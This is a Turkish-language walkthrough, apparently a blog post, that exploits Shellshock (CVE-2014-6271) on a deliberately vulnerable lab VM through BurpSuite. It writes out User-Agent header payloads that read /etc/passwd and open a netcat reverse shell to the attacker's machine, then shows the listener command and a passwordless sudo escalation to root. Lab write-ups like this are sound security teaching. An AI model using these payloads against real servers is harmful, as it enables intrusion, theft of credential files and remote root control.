Merhabalar. Bu yazımızda CVE-2014-6271 kodlu Shellshock zaafiyeti için oluşturulan sanal makineden reverse shell alarak root yetkisi kazanmaya çalışacağız. Öncelikle iso kalıbına buraya tıklayarak ulaşabilirsiniz. İso kalıbını indirip herhangi bir sanallaştırma platformuna kurduğunuzu varsayarak devam ediyorum. İso kalıbını kurduktan sonra sizi karşılayan ekrana ‘ifconfig’ yazarak IP adresini alabilirsiniz. Verdiği IP adresini saldırmak için kullanacağınız makinede browsera […]
]]>Merhabalar. Bu yazımızda CVE-2014-6271 kodlu Shellshock zaafiyeti için oluşturulan sanal makineden reverse shell alarak root yetkisi kazanmaya çalışacağız.
Öncelikle iso kalıbına buraya tıklayarak ulaşabilirsiniz.
İso kalıbını indirip herhangi bir sanallaştırma platformuna kurduğunuzu varsayarak devam ediyorum. İso kalıbını kurduktan sonra sizi karşılayan ekrana ‘ifconfig’ yazarak IP adresini alabilirsiniz. Verdiği IP adresini saldırmak için kullanacağınız makinede browsera yazıp girdiğinizde sizi aşağıdaki gibi bir ekran karşılıyor olacaktır.
Bu ekranı gördükten sonra hiçbir şey bilmeyen bir saldırganmışcasına ilk olarak CTRL + U ile sayfa kaynağını görüntülüyoruz ve orada aşağıdaki kod betiği dikkatimizi çekiyor.
Yukarıdaki CGI scripti sistem komutlarını çalıştırıp onları web sayfasında göstermeye yarıyor. Yani burada Shellshock zaafiyeti için hazır bir durum var.
BurpSuite programımızı açıyoruz.
‘Proxy’ sekmesinden ‘Intercept is on’ durumda olduğunu kontrol edip tekrar sayfamıza giriyoruz. Ardından sağ click yaparak ‘Send to Repeater’ diyoruz.
Biz burada HTTP isteklerini kullanarak saldırıyı gerçekleştirip ‘reverse shell’ almaya çalışacağız. Bunun için de ‘User Agent’ isimli HTTP Parametresini kullanacağız.
Bunun için daha önce ‘Repeater’ kısmında gönderdiğimiz isteğimizi görmek için, BurpSuite de üst kısımdan ‘Repeater’ sekmesini seçiyoruz ve isteğimiz karşımıza çıkıyor.
Ardından ‘User Agent’ kısmına:
() { :; }; /bin/bash -c 'ping -c 3 172.168.2.1; id; cat /etc/passwd'
kodunu ekliyoruz ve ‘Repeater’ kısmında bulunan ‘Go’ butonuna basarak etc/passwd dosyasını okumaya çalışıyoruz. Ve gelen değerlerde /etc/passwd dosyasını başarıyla okuduğumuzu görüyoruz.
Ardından, /etc/shadow v.s gibi dosyaları deneyip okuduktan sonra zaafiyeti tam olarak kullanabileceğimizi anlıyoruz. Bu durumda daha da ileri gidebilmek için içeriden bir erişim kazanma maksadıyla ‘reverse shell’ almaya çalışıyoruz. Bunun için, şu kodu yine ‘User-Agent’ kısmında kullanmamız gerekiyor.
() { :; }; /bin/bash -c 'nc IPADRESINIZ PORT -e /bin/sh'
Ardından, kullanacağımız portu da netcat ile dinlemeye almak için,
nc -lvp PORT
komutunu kullanmamız gerekiyor. Zaten ‘reverse shell’ almak için kullandığımız kodu detaylı incelerseniz nc komutu ile netcati aktifleştirdiğimizi görebilirsiniz.
‘Reverse shell’ kodumuzu ‘User-Agent’ parametresine eklemeden önce, yukaradaki ‘netcat’ komutu ile gerekli portu dinlemeye alıyoruz, ardından ‘Repeater’ sekmesindeki ‘Go’ butonuna ekrar basıp ‘reverse shell’imizi makineden alıyor ve içeriye erişim sağlıyoruz.
Başarılı bir biçimde bağlantıyı sağladıktan sonra,
sudo -s
komutuyla root olmaya çalıştığımızda şifre istemeden direkt olarak ‘root’ yetkilerini kazandık. Artık sistemde istediğimiz gibi at koşturabiliriz.
Yazımız burada sona eriyor, kafanıza takılan bir sorunuz olursa profilde bulunan iletişim adreslerinden bana ulaşabilirsiniz.
İyi shocklamalar!
]]>